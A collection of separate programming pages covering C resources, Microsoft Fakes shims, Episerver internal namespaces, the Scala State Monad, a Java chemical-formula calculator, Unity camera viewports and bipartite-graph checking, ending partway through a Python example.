QtCreator has great debugger integration as well as support for targeting Android. The manuals that come with most Linux software are an invaluable resource of knowledge.

If you are using Windows, or otherwise would prefer to view this information in a GUI, you can just try searching for 'man <function>' in your favourite search engine, and you will likely find one of the many online man-page repositories. This will be less useful for Windows users though. If you're already reaching for your browser, there is no end to good learning resources for C. A simple search will reveal great starting resources, so rather than reiterate those here we will share three resources that teach something interesting.

Create your own kernel module: If you ever wanted to get into really low-level programming, building your own driver for the Linux kernel, here is a guide that will help you. Instead of jumping into the deep end, this tutorial showcases a very simple kernel module that creates a /dev/reverse device in Linux which reverses the word order of strings sent to it. Where you take it from there is up to you.

Believe it or not, someone actually has to code the bits of software that allocate, deallocate and keep track of the memory used by the variables in your programs. Since creating and destroying variables happens a LOT in any software, speeding up this process can have a large impact on software performance, especially if the way you use variables is special, for instance if you are developing a game. This article and this one will give an overview of this bit of software.

Add a new feature to Python by modifying its code: If you've ever wondered how the features of a programming language map to actual code in its compiler or interpreter, this article is what you are looking for. It's written by a core Python contributor, and takes you through adding a new statement to the Python syntax by modifying its C code.
For tutorials on 15 other hot programming languages go here.
https://www.digit.in/software/learn-c-tutorial-c-basics-28481.html
This tutorial targets the Microsoft Fakes isolation framework on Visual Studio 2012 Ultimate or later; the process is also compatible with the developmental version, project name "Moles", running on Visual Studio 2008 or 2010. This tutorial assumes you have a basic understanding of the MSTest framework.

How to generate Fakes shims

The process of requesting shim generation is simple. First, we'll create a project with tests.

- Using Visual Studio 2012 Ultimate, create a new C# Class Library project
- Add a new unit test project to the solution
- Add a reference to the class library to the test project
- Right-click the test project's System reference - the context menu appears
- In the context menu, select "Add Fakes Assembly" - the Fakes folder is added to the project, containing two files:
  - mscorlib.fakes
  - System.fakes
- Open the mscorlib.fakes file and add a shim-generation entry for System.Environment, so that the file contains this XML code (restored from the comments below):

    <Fakes xmlns="">
      <Assembly Name="mscorlib" Version="4.0.0.0"/>
      <ShimGeneration>
        <Add FullName="System.Environment"/>
      </ShimGeneration>
    </Fakes>

Implementation

To prove this shim has been created, we build a simple test. First, open the default Class1.cs file in the class library project and create the following GetUserName method. The file should contain this code:

Class1.cs

    namespace ClassLibrary1
    {
        public static class Class1
        {
            public static string GetUserName()
            {
                return System.Environment.UserName;
            }
        }
    }

Next, open the default UnitTest1.cs unit test file in the test project. Replace all default code with the following:

UnitTest1.cs

    using Microsoft.QualityTools.Testing.Fakes;
    using Microsoft.VisualStudio.TestTools.UnitTesting;
    using System.Fakes;

    namespace ClassLibrary1.Test
    {
        [TestClass]
        public class Class1Test
        {
            [TestMethod]
            public void GetUserName_ReturnsSystemEnvironmentUserName()
            {
                string expected = "MyUserName";
                string actual;

                using (ShimsContext.Create())
                {
                    ShimEnvironment.UserNameGet = () => expected;
                    actual = Class1.GetUserName();
                }

                Assert.AreEqual(expected, actual);
            }
        }
    }

In the Test Explorer window, click the Run All button. The test should pass, indicating the shim functioned as expected.
"Add the following element" - the fakes XML isn't HTML-encoded, so it's getting eaten by my browser. Here is the missing text for the element you add to mscorlib.fakes:

    <fakes xmlns="">
      <assembly name="mscorlib" version="4.0.0.0">
        <shimgeneration>
          <add fullname="System.Environment">
          </add>
        </shimgeneration>
      </assembly>
    </fakes>

...and here is the corrected version! The version above was taken from the page source and has incorrect capitalisation which causes Visual Studio builds to fail.

    <Fakes xmlns="">
      <Assembly Name="mscorlib" Version="4.0.0.0"/>
      <ShimGeneration>
        <Add FullName="System.Environment"/>
      </ShimGeneration>
    </Fakes>

Thanks. It would be good to include the XML in the body of the post instead of keeping it in the comments.

There are more options in "Code generation, compilation, and naming conventions in Microsoft Fakes". However, note that the examples have a missing version in
http://thecurlybrace.blogspot.com/2012/10/how-to-generate-missing-fakes-shims.html
One of the primary considerations when building a software platform that other developers base their work on is maintaining backwards compatibility. As the platform grows larger and more complex, this can become the major restraining factor when trying to sustain a high development pace. Once you start to use strict semantic versioning it becomes glaringly obvious that no API changes can be made, no matter how small the change or how obscure the class, without releasing a new major version. And while releasing a new major version might not be as big a deal as it used to be, it does add additional work, not just internally, but also for any maintainers of third-party modules trying to keep their modules up to date. The typical approach to this problem is to keep your public classes to a minimum and only expose classes that are actually useful for external developers to interact with. Limiting the API is currently done primarily by keeping classes or methods internal. And while we might be high-fiving each other at the office every time we can add the internal keyword to a class, it seems like it is making some of you platform users less happy, some more than others. Another option is to use the API documentation and explicitly call out the classes and methods that are considered internal. And while this method has been used with some success in the past, such as in the case of the EPiServer.DataAccess namespace, it can sometimes be hard to keep track of which APIs are public or not if they are spread out. For quite some time now we have been discussing better ways to manage these API restrictions. But as always, while you discuss, other people do, and this is exactly what Microsoft has done. In their latest .NET Core platform they have introduced the notion of "Internal namespaces", a specific namespace pattern that indicates that you are now dealing with classes that are not a part of the public API.
As this was very closely aligned with our own thoughts, we have decided to follow suit and use the same approach. This means that going forward any class located in a namespace named 'Internal' will not be considered a part of our supported public API. These classes can still be used; they are just not covered by the semantic versioning promise and can therefore change between minor releases without prior warning. Any problems that arise from using them will also not be covered by our usual support. It should however mean that we can expose more classes as public in our assemblies, so that they are easier to use if you really, really need to, or for any non-production scenarios such as unit testing. This does not imply that everything outside these namespaces will be a part of the public API, as there will still be classes and methods that are explicitly documented as being for "internal use", but we will try to keep these to a minimum whenever possible. There are some areas in CMS and other products where you can already find Internal namespaces, but so far the use has been relatively limited. In our next major release, Episerver CMS 10, which is just around the corner, you will notice that we have moved a lot of classes from their current location to these Internal namespaces in an attempt to minimize the weight of our legacy backpack. This will include any classes that we do not consider important for typical use cases or implementations of public abstractions. So when you upgrade a solution, please be careful and make sure that you don't accidentally add any Internal namespaces to your using statements, as this may cause you problems in the future. Should you find a class or interface that you believe should have remained in the public API, please contact us and tell us why you think this should be the case.

Sounds great!

Totally agree! -External highfive-

Hi and thanks for the article.
However, it would be nice with a follow-up article on how to solve some errors after upgrading to 10. Thanks

Hi, would it be possible to get an example of how to solve some of the errors after the upgrade? I can see in your own Alloy demo kit you changed your code to use internal, like the DynamicContentFactory for instance.

How about ContentDB? This type is not mentioned in the breaking changes / release notes (CMS-3762 / CMS-3755). We use the ContentDB.BeforeSavingProperty event to detect changes made to Dynamic Properties. However, after upgrading (from 9) to 10 it's not available anymore. Is there a new way to detect changes made to Dynamic Properties? I know the documentation has said 'This member supports the EPiServer infrastructure and is not intended to be used directly from your code.' since version 7 (or maybe even earlier, and I think it was available through PageDB before that). However, it was there and we need(ed) it, so we used it...
https://world.episerver.com/blogs/Henrik-Nystrom/Dates/2016/10/introducing-changes-to-reduce-our-public-api/
Introduction

I have been doing object-oriented programming in Java for almost a decade. For the past six months, I have been doing functional programming in Scala. This blog is about the reasoning behind why we need the "State Monad".

Modifying a variable – SIDE EFFECT

If "Design Patterns: Elements of Reusable Object-Oriented Software" is the bible for object-oriented design patterns, I would say the "Functional Programming in Scala" book is the bible for learning functional programming. The "FP in Scala" book starts by defining: "Functional programming (FP) is based on a simple premise with far-reaching implications: we construct our programs using only pure functions – in other words, functions that have no side effects. What are side effects? A function has a side effect if it does something other than simply return a result." For example: modifying a variable is a SIDE EFFECT.

When I first read that modifying a variable is a "SIDE EFFECT", I was completely surprised and puzzled, since we do it all the time in OOP. For example, i++ is a side-effecting operation. I was wondering, how do we make state changes in FP? Well, the answer is the State Monad.

State Monad

Chapter 6, "Purely functional state", in the "FP in Scala" book starts with the problem of random number generation.

Random number with side effect:

    val rng = new scala.util.Random // Create an instance of Random
    rng.nextInt // Call nextInt to get a random integer
    rng.nextInt // Call nextInt to get a random integer

Every time you call the nextInt function it doles out a new random value: rng has some internal state that gets updated after each invocation, since we would otherwise get the same value each time we called nextInt. Basically, if you think about the implementation, it holds an internal STATE using which it generates a NEW RANDOM VALUE when you call the function.
To make the implementation pure, accept the STATE as a function parameter, to be passed by the caller every time they need a value.

Random number without side effect:

    trait RNG {
      def nextInt: (Int, RNG)
    }

    case class SimpleRNG(seed: Long) extends RNG {
      def nextInt: (Int, RNG) = {
        val newSeed = (seed * 0x5DEECE66DL + 0xBL) & 0xFFFFFFFFFFFFL;
        val nextRNG = SimpleRNG(newSeed);
        val n = (newSeed >>> 16).toInt
        (n, nextRNG)
      }
    }

The common abstraction for making stateful APIs pure is the essence of the State Monad. The essence of the signature:

    case class StateMonad[S, A](run: (S => (A, S)))

Basically, it encapsulates a run function which takes a STATE argument and returns a TUPLE capturing the (VALUE, NEXT STATE). The problem has been inverted in a way where the client needs to pass the "NEXT STATE" to generate the next (VALUE, STATE).

SIMPLE USE CASE

Assume that there is a CRUD application to create, update, find and delete employees, using a MySQL database for persistence. If you open a SINGLE database terminal and issue CRUD operations against the database, what is essentially happening is a STATE TRANSITION. Say there is an "EMPLOYEE" table with zero records, which can be thought of as the initial state D of the database. Now if you issue INSERT INTO EMPLOYEE VALUES('VMKR'), a new record gets inserted, which can be thought of as a new state D' of the database, the value produced being the employee record. So it is a database transition from D => (VALUE, D').

Now assume that you wanted to write unit test cases for this CRUD API. Obviously you would not want to hit the database and would ideally mock it. A simple way to mock a database is to use an in-memory map.
Initial state: empty Map
Create an employee: (empty Map) => (Map with 1 record, Employee value)
Update an employee: (Map with 1 record) => (Map with 1 record, Employee value)
Find an employee: (Map with 1 record) => (Map with 1 record, Option[Employee])
Delete an employee: (Map with 1 record) => (empty Map, Unit)

BINGO! We can use the "State Monad" abstraction to solve this problem. I have listed the source code below:

    package com.fp.statemonad

    import StateMonad._
    import scala.collection.immutable.TreeMap

    case class StateMonad[S, A](run: (S => (A, S))) {
      def map[B](f: A => B): StateMonad[S, B] = StateMonad(s => {
        val (a, s1) = run(s)
        (f(a), s1)
      })

      def flatMap[B](f: A => StateMonad[S, B]): StateMonad[S, B] = StateMonad(s => {
        val (a, s1) = run(s)
        f(a).run(s1)
      })
    }

    case class Employee(id: Int, name: String)

    trait MEmployee[M[_]] {
      def createEmployee(id: Int, name: String): M[Employee]
      def updateEmployee(id: Int, name: String): M[Employee]
      def findEmployee(id: Int): M[Option[Employee]]
      def deleteEmployee(id: Int): M[Unit]
    }

    object MEmployee extends MEmployeeInstances {
      def createEmployee[M[_]](id: Int, name: String)(implicit M: MEmployee[M]): M[Employee] =
        M.createEmployee(id, name)
      def updateEmployee[M[_]](id: Int, name: String)(implicit M: MEmployee[M]): M[Employee] =
        M.updateEmployee(id, name)
      def findEmployee[M[_]](id: Int)(implicit M: MEmployee[M]): M[Option[Employee]] =
        M.findEmployee(id)
      def deleteEmployee[M[_]](id: Int)(implicit M: MEmployee[M]): M[Unit] =
        M.deleteEmployee(id)
    }

    trait MEmployeeInstances {
      // TEST INSTANCE
      implicit def MEmployee[M[+_], S] =
        new MEmployee[({ type λ[α] = StateMonad[Map[Int, Employee], α] })#λ] {
          def createEmployee(id: Int, name: String) = StateMonad(m => {
            val e = Employee(id, name);
            (Employee(id, name), m.+((id, e)))
          })
          def updateEmployee(id: Int, update: String) = StateMonad(m => {
            val e = Employee(id, update);
            (Employee(id, update), m.+((id, e)))
          })
          def findEmployee(id: Int) = StateMonad(m => {
            val o = m.get(id);
            (o, m)
          })
          def deleteEmployee(id: Int) = StateMonad(m => {
            ((), m.-(id))
          })
        }
    }

    object Run extends App {
      import StateMonad._

      type TestState[M] = StateMonad[Map[Int, Employee], M]

      val state = for {
        c1 <- MEmployee.createEmployee[TestState](1, "Mayakumar Vembunarayanan")
        c2 <- MEmployee.createEmployee[TestState](2, "Aarathy Mayakumar")
        u1 <- MEmployee.updateEmployee[TestState](1, "vmkr")
        f1 <- MEmployee.findEmployee[TestState](1)
        _ = println("Found Employee: " + f1)
        _ <- MEmployee.deleteEmployee[TestState](1)
      } yield ()

      println(state.run(Map()))
    }

The code does the following:

- case class StateMonad[S, A](run: (S => (A, S))) is the crux of making state transitions pure.
- It has map and flatMap, making it a "FUNCTOR" and a "MONAD". To understand more about "FUNCTOR" and "MONAD", read here: FUNCTOR_AND_MONAD
- case class Employee(id: Int, name: String) is the Employee data model with an id and a name.
- trait MEmployee[M[_]] defines the CRUD APIs. Think of it as an "interface" in Java parlance.
- object MEmployee is the companion object. Its purpose is to make the usage of trait MEmployee easier for the client. Clients can simply call MEmployee.createEmployee. It will work as long as there is an implementation implicitly available, as required by the signature (implicit M: MEmployee[M]).
- The test implementation using the State Monad with an in-memory Map is provided by MEmployeeInstances.
- The cryptic syntax ({ type λ[α] = StateMonad[Map[Int, Employee], α] })#λ is called TYPE_LAMBDAS
- The absolute magic of the State Monad in the above example is that the code execution actually happens when we run the State Monad, which happens here: println(state.run(Map()))
- One other important point: flatMap implicitly passes the state (in this example, the Map) to each of the subsequent functions after the first createEmployee, since the for-comprehension on a Monad is syntactic sugar for using the flatMap function all the way down, finally yielding a value using the map function.
Output of running the program:

    Found Employee: Some(Employee(1,vmkr))
    ((),Map(2 -> Employee(2,Aarathy Mayakumar)))
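The S => (A, S) signature is not Scala-specific. Here is a hypothetical sketch in Python (mine, not from the post) of the SimpleRNG above, showing the same state-passing style: a "stateful" operation becomes a plain function from a state to a (value, next_state) pair, so the same input state always yields the same value.

```python
# State-passing style: a pure pseudo-random generator mirroring the Scala
# SimpleRNG above. Each call maps a state (the seed) to (value, next_state).
def next_int(seed):
    new_seed = (seed * 0x5DEECE66D + 0xB) & 0xFFFFFFFFFFFF
    return new_seed >> 16, new_seed  # (value, next state)

v1, s1 = next_int(42)        # v1 == 16159453
v2, s2 = next_int(s1)        # threading the state by hand yields the next value
v1_again, _ = next_int(42)   # same input state => same output: no hidden side effect
assert v1 == v1_again
```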
https://vmayakumar.wordpress.com/2015/12/31/magic-of-state-monad/
Java and Chemistry: A Simple Chemical Calculator Lexical analysis of a chemical formula<![if !supportNestedAnchors]><![endif]> Calculation of the molecular weight Example 1: Calculation of molecular weight Example 2: Preparation of a solution with a given concentration Example 3: Preparation of a mixture of two compounds Lexical analysis of a chemical formula The initial operation in chemistry is to transform a chemical formula, which is a string corresponding to a sequence of characters and digits, into a molecular weight (a real number). It is obvious for the intellect of the chemist but cannot be easily achieved by the computer. Lexical analysis of the chemical formula is performed in the class analysis: analysis: an = new analysis(chemical_formula). Characters are analysed following the sequence: <![if !supportLists]>7 <![endif]>Beginning of the lexical analysis of a chemical formula with n atoms and n coefficients <![if !supportLists]>o <![endif]>Atom n and corresponding coefficient - First letter has to be uppercase: H, Cl, .. - If exists, second letter has to be lowercase: Cl, Al, ... - Then could be a number (digit): H2O, Al2O3, ... - Could be again a number if the coefficient is more than 9 - Then could be a dot if it is a real number: Fe0.9O, ... 
- Then could be a digit (first decimal) - Then could be again a digit (second decimal) - The next character could be a comma: NaCl,H2O - Atom n and coefficient are obtained; go to the atom n+1 - End of the lexical analysis class analysis{ String chemForm; float molmas = 0f; analysis(String cForm){ chemForm = cForm;//Chemical formula String s[] = new String[20];// Symbols of the elements in the chemical formula float massat = 0;//Atomic masses --------------------------------------------- float coeff[] = new float[20];// Coefficients -------------------------------- int len = cForm.length();//Number of characters in the formula char c; String ch, coefficient; int a = 0, i = 0, end = 0; cForm = cForm + " "; // Lexical analysis of the chemical formula in args[0] do{ ch = ""; coefficient = "1"; coeff[a] =0; // First letter has to be uppercase c = cForm.charAt(i); if(Character.isUpperCase(c)){ ch = String.valueOf(c); s[a] = ch; i++; } // If exists, second letter has to be lowercase c = cForm.charAt(i); if(Character.isLowerCase(c)){ ch = String.valueOf(c); s[a] =s[a] + ch; // The symbol of the element is obtained i++; } // Then could be a number (digit) c = cForm.charAt(i); if (Character.isDigit(c)){ coefficient = String.valueOf(c); i++; } // Could be again a number c = cForm.charAt(i); if (Character.isDigit(c)){ coefficient = coefficient + String.valueOf(c); i++; } // Then could be a dot if it is a real number c = cForm.charAt(i); if(c =='.'){ coefficient = coefficient + "."; i++; } // Then could be a digit (first decimal) c = cForm.charAt(i); if (Character.isDigit(c)){ coefficient = coefficient + String.valueOf(c); i++; } // Then could be again a digit (second decimal) c = cForm.charAt(i); if (Character.isDigit(c)){ coefficient = coefficient + String.valueOf(c); i++; } c = cForm.charAt(i); // The next character could be a comma if(c ==',') i++; coeff[a] = Float.valueOf(coefficient).floatValue(); if (coeff[a]==0) coeff[a] = 1; a++; }while(i<=len-1); // End of the 
lexical analysis of the chemical formula end = a - 1; calc_masmol ms = new calc_masmol(end, s, coeff); molmas = ms.mt(); } float result(){return molmas;} } Calculation of the molecular weight Molecular weights are obtained from the class calc_massat. The atomic symbols symb[] and weights ma[], are put in the program as final arrays. This data could be read in an extra file but as they are definitively fixed it is more convenient to compile them. class calc_masmol{ float masmol; static final String symb[] = {"Ac", "Ag", "Al", "Am", "As", "At", "Au", "B", "Ba", "Be", "Bi", "Bk", "Br", "C", "Ca", "Cd", "Ce", "Cf", "Cl", "Co", "Cr", "Cs", "Cu", "Dy", "Er", "Es", "Eu", "F", "Fe", "Ga", "Gd", "Ge", "H", "Hf", "Hg", "Ho", "I", "In", "Ir", "K", "La", "Li", "Lu", "Lr", "Md", "Mg", "Mn", "Mo", "N", "Na", "Nb", "Nd", "Ni", "No", "Np", "Os", "P", "Pa", "Pb", "Pd", "Pm", "Po", "Pr", "Pt", "Pu", "Ra", "Rb", "Re", "Rh", "Ru", "S", "Sb", "Sc", "Se", "Si", "Sm", "Sn", "Sr", "Ta", "Tb", "Tc", "Te", "Th", "Ti", "Tl", "Tm", "U", "V", "W", "Y", "Yb", "Zn", "Zr", "O"}; static final float ma[] = {227.0278f, 107.8682f, 26.98f, 243.0614f, 74.9216f, 209.987f, 196.966f, 10.811f, 137.327f, 9.012f, 208.980f, 247.07f, 79.904f, 12.011f, 40.078f, 112.411f,140.115f, 251.0796f, 35.4527f, 58.933f, 51.996f, 132.905f, 63.546f, 162.50f, 167.26f, 252.083f, 151.965f, 18.998f, 55.847f, 69.723f, 157.25f, 72.61f, 1.00794f, 178.49f, 200.59f, 164.930f, 126.905f, 114.82f, 192.22f, 39.0983f,138.906f, 6.941f, 174.967f, 260.1053f, 258.099f, 24.305f, 54.938f, 95.94f, 14.007f, 22.90f, 92.906f, 144.24f, 58.69f, 259.1009f, 237.048f, 190.2f, 30.974f, 231.036f,207.2f, 106.42f, 146.915f, 208.9824f, 140.908f, 195.08f, 244.064f, 226.03f, 85.47f, 186.207f, 102.91f, 101.07f, 32.066f, 121.75f, 44.96f, 78.96f, 28.09f, 150.36f, 118.71f, 87.62f, 180.95f, 158.93f, 98.91f, 127.6f, 232.04f, 47.88f, 204.38f, 168.93f, 238.029f, 50.94f, 183.85f, 88.91f, 173.04f, 65.39f, 91.224f, 15.994f}; calc_masmol(int ed, String s[], float 
coeff[]){ float massat[] = new float[ed + 1]; for (int a = 0; a <= ed; a++){ for (int i = 0; i<=symb.length-1; i++ ){ if (s[a].equals(symb[i])){ massat[a] = ma[i]; break; } } } for (int a = 0; a <= ed; a++) if (massat[a] > 0) masmol= masmol + massat[a]*coeff[a]; else { masmol=0; break; } } float mt(){return masmol;} } Usage These two previous classes can be used for many purposes in chemistry such as calculation of a molecular weight, preparation of a solution with a given concentration or preparation of a mixture of two compounds (obviously of n compounds). In the next applications, formulae must be case sensitive: NaCl. The coefficient of the element has to be written after the symbol: C6H6. Non integer coefficients are accepted: Ba0.5Sr0.5TiO3. Additive formula - NaClO4,H2O - is also possible but formula like FeCl3,6H2O is not accepted and has to be written FeCl3, H12O6. In order to shorten this article, the exceptions are not considered in the following lines but they are in the downlodable application (chemCalcApp.java) Example 1: Calculation of molecular weight A very simple application can be written : public class chemCalcApp{ public static void main (String[] args){ analysis an = new analysis(args[0]); System.out.println("Molecular weight of " + args[0] + " = " + an.result() + "g"); } } The result in the console is as following D>java chemCalcApp H2O Molecular weight of H2O = 18.00988g Example 2: Preparation of a solution with a given concentration public class calcsol{ public static void main (String[] args){ analysis an = new analysis(args[0]); System.out.println("Weigth " + an.result()*Float.valueOf(args[1]).floatValue() + " g "+ " of " + args[0] + " for 1 liter of solvent"); } } The chemical formula and the desired concentration are obtained from the command line as args[0] and args[1]. 
In the console: D>java calcsol NaCl 0.01 Weigth 0.58352697 g of NaCl for 1 liter of solvent Example 3: Preparation of a mixture of two compounds public class mixing{ public static void main (String[] args){ analysis an1 = new analysis(args[0]); float w1 = an1.result(); analysis an2 = new analysis(args[1]); float w2 = an2.result(); float coef1 = Float.valueOf(args[2]).floatValue(); float coef2 = Float.valueOf(args[3]).floatValue(); float total = Float.valueOf(args[4]).floatValue(); float totalmolmas = w1*coef1 + w2*coef2; System.out.println("Amount to weight for a total mass of " + total + "g"); System.out.println(args[0] + " = "+ w1*total/totalmolmas + " g "); System.out.println(args[1] + " = "+ w2*total/totalmolmas + " g "); } } The chemical formulae (args[0] and args[1]), the molar coefficients (args[2] and args[3]) and the desired total weight (args[4]) are obtained from the command line. In the console: D>java mixing NaCl KCl 1 1 10 Amount to weight for a total mass of 10.0g NaCl = 4.3905997 g KCl = 5.6094 g Downloads: chemCalcApp.java (5K); the applets (1.23M). About the Author: Josik Portier is Directeur de Recherche at the Institut de Chimie de la Matière Condensée de Bordeaux of the Centre National de la Recherche Scientifique.
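The same tokenize-then-sum approach can be sketched in a few lines of Python. Note this is an illustrative sketch, not the article's Java code: the mass table below is a four-element subset (using the article's own values), not the full 94-element array.

```python
# Tokenize "Symbol + optional decimal coefficient" pairs, then sum
# coefficient * atomic mass, mirroring the article's two-stage design.
import re

# Illustrative subset of atomic masses, taken from the article's table.
ATOMIC_MASS = {"H": 1.00794, "O": 15.994, "Na": 22.90, "Cl": 35.4527}

def molecular_weight(formula):
    total = 0.0
    # One uppercase letter, optional lowercase letter, optional decimal coefficient.
    # Characters that match nothing (like the comma in "NaCl,H2O") are skipped.
    for symbol, coeff in re.findall(r"([A-Z][a-z]?)(\d*\.?\d*)", formula):
        total += ATOMIC_MASS[symbol] * (float(coeff) if coeff else 1.0)
    return total

print(round(molecular_weight("H2O"), 5))  # 18.00988, matching the article's output
```

With the article's mass values this reproduces the console results above (H2O = 18.00988 g, NaCl = 58.3527 g).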
http://www.developer.com/tech/article.php/987961/Java-and-Chemistry-A-Simple-Chemical-Calculator.htm
Hey all, I am very new to Unity and my math skills aren't fantastic so I apologise in advance for the newbie question ;) Scenario: I have a camera in my scene and I need to adjust its viewport as the screen resizes in order to place it correctly within the surrounding UI. I decided to add a container to my UI canvas so that this can be repositioned and sized automatically by Unity. Then my plan was to simply make the camera's viewport position and size match it. In order to achieve this I decided to make the below component to handle the repositioning and resizing. I am working in 2D and therefore using an orthographic camera; the UI is in Screen Overlay mode with a pixel perfect canvas. There is also a canvas scaler set to scale to screen size with a reference resolution of 1920x1080. Code: Note that I have removed contract (null) checks from Awake to make the example more concise: public class ScaleCameraViewportToCanvasTarget : MonoBehaviour { // Unity visible properties public GameObject ScaleToFit; // private Camera cameraToScale; private RectTransform targetTransform; private Canvas canvas; public void Awake() { this.targetTransform = ScaleToFit.GetComponent<RectTransform>(); this.canvas = ScaleToFit.GetComponentInParent<Canvas>(); this.cameraToScale = GetComponent<Camera>(); } public void LateUpdate() { // Determine target dimensions taking into consideration canvas scaling var width = targetTransform.rect.width * canvas.scaleFactor; var height = targetTransform.rect.height * canvas.scaleFactor; // Get centre point of our target in Canvas Space var centreX = targetTransform.anchoredPosition.x; var centreY = targetTransform.anchoredPosition.y; // Adjust for anchor from centre to upper left var left = centreX - (width * 0.5f); var top = centreY - (height * 0.5f); // Convert from Canvas Space to Screen Space left = left + (Screen.width * 0.5f); top = top + (Screen.height * 0.5f); // Adjust camera 
viewport var targetRect = new Rect(left, top, width, height); this.cameraToScale.pixelRect = targetRect; } } Problem: This does kinda work but it isn't accurate. When canvas scaling is off everything works as expected but when it is enabled the width and height are correct but the left, top positioning isn't correct. For example: X is -0.03813588 when it should be 0.0 Y is 0.04876541 when it should be 0.03876541 (±) Any ideas? I have spent a lot of time on this and I can't help but think I am doing something fundamentally wrong. Many thanks in advance, Mark is it -0.03813588, or is it -0.03813588e-xx The second one means "as good as zero", and happens because of rounding errors (which are inevitable whenever you're working with floating point numbers). It's not actually visible on the screen ever. @Baste - The former (no exponent). It is worth me clarifying that I see a noticeable visual difference between 0.0 and -0.03813588, hence the problem. Answer by SuperMoog · Aug 24, 2015 at 08:03 AM Hi all, I have worked out the issue myself. I wasn't adjusting the position by the scale factor. Applying the factor to the anchored position prior to manipulation fixes the issue: var centreX = targetTransform.anchoredPosition.x * canvas.scaleFactor; var centreY = targetTransform.anchoredPosition.y * canvas.scaleFactor; Many Thanks, Mark Thank you. Answer by Malkyne · Dec 13, 2015 at 08:13 PM For future reference, this is the code I use to do the same thing. Whenever your RectTransform resizes, it's going to trigger OnRectTransformDimensionsChange. You can use this to do your camera viewport adjustments. 
So, you can put this code on your RectTransform: [RequireComponent(typeof(RectTransform))] public class CameraViewSizer : MonoBehaviour { [SerializeField] private Camera _camera; protected void OnRectTransformDimensionsChange() { _camera.pixelRect = Util.RectTransformToScreenSpace((RectTransform)this.transform); } } This is the RectTransformToScreenSpace function used above: public static class Util { public static Rect RectTransformToScreenSpace(RectTransform transform) { Vector2 size = Vector2.Scale(transform.rect.size, transform.lossyScale); return new Rect((Vector2)transform.position - (size * 0.5f), size); } }
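The arithmetic behind the accepted fix can be checked outside Unity. This plain-number sketch (all values are made-up illustration numbers, not from Unity) applies the canvas scale factor to both the size and the anchored position before converting to screen space:

```python
# Numeric sketch of the accepted answer: the anchored position must be
# multiplied by the canvas scale factor, the step missing in the question.
def viewport_rect(anchored_x, anchored_y, width, height, scale, screen_w, screen_h):
    w, h = width * scale, height * scale
    cx, cy = anchored_x * scale, anchored_y * scale  # the fix from the answer
    # shift anchor from centre to the corner, then from canvas to screen space
    left = cx - w / 2 + screen_w / 2
    top = cy - h / 2 + screen_h / 2
    return left, top, w, h

# A centred 400x300 target on a 1920x1080 screen at scale factor 1.5:
print(viewport_rect(0, 0, 400, 300, 1.5, 1920, 1080))  # (660.0, 315.0, 600.0, 450.0)
```

With the scale factor left out of the position (the original bug), an off-centre target would land at the wrong left/top while width and height stayed correct, which is exactly the symptom described above.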
https://answers.unity.com/questions/1034369/converting-position-to-screen-space.html
A bipartite graph is a type of graph in which the vertices are divided into two sets, with no edges between the vertices of the same set. In a bipartite graph, the length of every cycle is even. The sets of vertices into which we divide the graph are called the parts of the graph. Let's see an example of a bipartite graph. Here we can divide the nodes into 2 sets which follow the bipartite property. Say the set containing vertices 1,2,3,4 is set X and the set containing vertices 5,6,7,8 is set Y. We see clearly that there are no edges between the vertices of the same set. Note: A complete bipartite graph is a special type of bipartite graph in which every vertex of set X is connected to every vertex of set Y through an edge. Properties of a Bipartite Graph - It does not contain odd-length cycles. - It is two-colorable. - Subgraphs of a bipartite graph are also bipartite. - The sum of the degrees of the vertices of set X is equal to the sum of the degrees of the vertices of set Y. - Checking whether a graph is bipartite also tells us whether its spectrum is symmetric: a bipartite graph has a symmetric spectrum, and a non-bipartite graph does not. - A bipartite graph consisting of N vertices can have at most (1/4)*N*N edges. There are basically two ways to check whether a graph is bipartite: - Using BFS to check whether the graph contains an odd-length cycle. If a cycle with odd length is found, the graph is not bipartite. - Using DFS to check whether the graph is 2-colorable. If it is two-colorable, the graph is bipartite. Check whether a graph is bipartite using BFS Algorithm Step 1: Make a graph using the adjacency list. Step 2: For i in range 1 to N: a) If i is unvisited then: i) BFS(i). ii) If we find an odd-length cycle, we stop the process and report that the graph is not bipartite. Check whether a graph is bipartite using DFS Algorithm Step 1: Use colors 0 and 1 to color the vertices. 
Step 2: Call DFS(start). Step 3: Assign the opposite color of the parent to the current node and call DFS to visit the neighbors of the current node. Step 4: If at any step we find that two connected nodes have the same color, return false. Step 5: If we visit all the nodes without finding two connected nodes of the same color, return true. Implementation /*C++ implementation to check whether a graph is bipartite or not.*/ #include<bits/stdc++.h> using namespace std; /*function to check whether the graph is bipartite or not.*/ int check_bipartite(int node,vector<int> v[],bool visited[],int assign[]) { /*visit all nodes connected to node*/ for(int itr: v[node]) { /*if the connected node is unvisited then recurse*/ if(!visited[itr]) { visited[itr]=true; assign[itr]=!assign[node]; if(!check_bipartite(itr,v,visited,assign)) { return 0; } } /*if two adjacent nodes have the same color then return false*/ else if(assign[itr]==assign[node]) { return 0; } } /*else return true*/ return 1; } int main() { int nodes,edges; /*read the number of nodes and edges*/ cin>>nodes>>edges; vector<int> v[nodes+1]; /*create undirected graph*/ for(int i=0;i<edges;i++) { int x,y; cin>>x>>y; /*add edge between x -> y*/ v[x].push_back(y); /*add edge between y -> x*/ v[y].push_back(x); } bool visited[nodes+1]; /*set all the nodes as unvisited*/ memset(visited,false,sizeof(visited)); int assign[nodes+1]; int test = 1; /*check all the nodes in the graph*/ for(int i=1;i<=nodes;i++) { /*if node is unvisited*/ if(!visited[i]) { visited[i]=true; assign[i]=0; /*check this connected component*/ test=check_bipartite(i,v,visited,assign); /*if test is 0 then the graph is not bipartite, stop early*/ if(test==0) { goto label; } } } label:; /*print the result*/ if(test==1) { cout<<"Graph is Bipartite"<<endl; } else { cout<<"Graph is not Bipartite"<<endl; } return 0; } 8 6 1 6 6 3 3 8 5 2 2 7 7 4 Graph is Bipartite Time Complexity O(N+E) where N is the number of nodes and E is the number of edges. 
Building the adjacency list takes O(N+E) time, which dominates the whole process. Space Complexity O(N+E) where N is the number of nodes and E is the number of edges. The adjacency list is the largest structure, using O(N+E) space.
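The same 2-coloring idea can be written compactly in Python. This is a BFS variant of the check, as a sketch rather than a translation of the C++ above:

```python
# 2-colour each connected component with BFS; a graph is bipartite
# iff no edge ever connects two nodes of the same colour.
from collections import deque

def is_bipartite(n, edges):
    adj = [[] for _ in range(n + 1)]  # 1-indexed, matching the tutorial
    for x, y in edges:
        adj[x].append(y)
        adj[y].append(x)
    colour = [None] * (n + 1)
    for start in range(1, n + 1):     # handle every connected component
        if colour[start] is not None:
            continue
        colour[start] = 0
        queue = deque([start])
        while queue:
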